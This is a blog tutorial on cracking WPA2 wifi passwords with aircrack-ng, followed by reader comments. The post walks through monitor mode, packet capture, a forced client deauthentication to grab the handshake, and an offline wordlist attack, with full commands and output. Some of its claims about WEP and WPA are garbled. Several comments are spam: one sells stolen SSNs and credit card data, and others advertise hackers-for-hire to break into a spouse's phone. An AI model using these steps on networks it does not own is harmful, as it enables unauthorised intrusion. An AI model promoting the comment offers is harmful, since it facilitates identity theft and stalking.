Hacking wireless wifi passwords

The most common type of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as wired network. However it isn’t happened a group of FBI hacked the WEP in less than three minutes There are several open source utilities like aircrack-ng, weplab, WEPCrack, or airsnort that can be used by crackers to break in by examining packets and looking for patterns in the encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .

Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of 14 characters.
Now if your wifi device supports for WPA2 than use it, as many users don’t know that their device supports for many security encryption techniques.  Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in address bar and here you will get your routers configuration, where you can select 

Cracking Wireless Network
 As we have read above this is an easy task, we just have to use our network card in monitor mode so as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using  aircrack-ng. But only small number if cards support this mode under windows. But you can use live CD of any linux OS (commonly BackTrack 3 ) or install linux OS as virtual machine.
Now download aircrack-ng for linux or windows platform from here.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng

First, put the card in monitor mode :

root@bt:~# airmon-ng 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate.  Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230 

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.  There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time
The first option is by using a worklist/drstionary file.  A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
 
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. 

26 comments:

  1. Hey I cant Understand this. Please tell me how to hack wifi password A-Z. with screen shots. Great blog. keep it up

    ReplyDelete
    Replies
    1. Hey Guys !

      USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
      All Leads have genuine & valid information

      **HEADERS IN LEADS**
      First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If anyone buy in bulk, we can negotiate
      *Sampling is just for serious buyers

      ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
      ->$5 PER EACH

      ->Hope for the long term deal
      ->Interested buyers will be welcome

      **Contact 24/7**
      Whatsapp > +923172721122
      Email > leads.sellers1212@gmail.com
      Telegram > @leadsupplier
      ICQ > 752822040

      Delete
  2. firstly you need to download the aircrack folder than change your cmd or terminal directory to its root and simply continue with given commands

    ReplyDelete
  3. Access WIFI in three easy steps: Access you pocket. Find your walet. PAY.

    ReplyDelete
    Replies
    1. that defeats the purpose of the tutorial

      Delete
  4. I don't understand this. It would be much better and understandable if you put images or pictures for every step to serve as guide for us. Thank you for sharing..

    ReplyDelete
    Replies
    1. get a life put effort into it or die trieing,,

      Delete
  5. If you aren't willing to put in the effort to learn to do it, you should pay for it. Stop whining about a lack of screenshots, they left the code examples!

    ReplyDelete
  6. Your download back track 5 running for CD
    Air crack use in the back track

    ReplyDelete
  7. how to enter the backtrack menu?

    ReplyDelete
  8. Could you , Tell me How I can Download : Aircrack-ng or :BACKTRACK
    Please , give me a link for Download them

    ReplyDelete
  9. i cant fine my device driver in backtrack 5 i have tplink usb & athos wifi internal but both working in linux ....

    any advice ...

    ReplyDelete
  10. Thanks. it worked..

    ReplyDelete
  11. my backtrack doesn't boot in my laptop when i try using live cd and usb but it boot in vm ware. I don't have external wifi card so I want to use live cd or usb. I have dell inspirion n1510. Is there any solution?

    ReplyDelete
  12. fuckkkkkkkkk

    ReplyDelete
  13. Bonjour à tous ! sur mon site vous trouverez des codes Free Wifi privé et qui ne ce désactive jamais ou du moin pour longtemps !

    ︻̷̿┻̿═━一 code free wifi identifiant

    ReplyDelete
  14. Bonjour à tous je partage mes dernier code Free Wifi ︻̷̿┻̿═━一 https://code-freewifi.com/

    CODE FREE WIFI 2016 ID 548

    ReplyDelete
  15. Bonjour a tous Je vous partage mon site ou je partage des codes free wifi pour tous et fonctionnel http://code-free-wifi-gratuit.fr/

    ReplyDelete
  16. hey Voici un site de code free wifi gratuit je partage des codes chaque semaine mais vous pouvez aussi acheter des code wifi privée website ===========> http://code-free-wifi-gratuit.fr/

    ReplyDelete
  17. I prefer to use all possible ways to protect myself and my data, compulsory fees because their safety is very important to me.

    ReplyDelete
  18. i was lost with no hope for my wife was cheating and had always got away with it because i did not know how or

    always too scared to pin anything on her. with the help a friend who recommended me to who help hack her phone,

    email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to

    SUPERIOR.HACK@GMAIL.COM . am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. you could also text +1 213-295-1376(whatsapp) contact and thank me later

    ReplyDelete
  19. I know an organization who have private investigators for hire who can help you get into your spouse’s phones,emails remotely from your phone they can also help you with your
    * credit score
    * clearing of criminal record
    *increasing of school grades and any thing that has to do with hacking etc
    You can confirm for yourself from their email support@wavedrive.tech or website https://wavedrive.tech so you can also give your testimony
    Whatsapp No: +14106350697

    ReplyDelete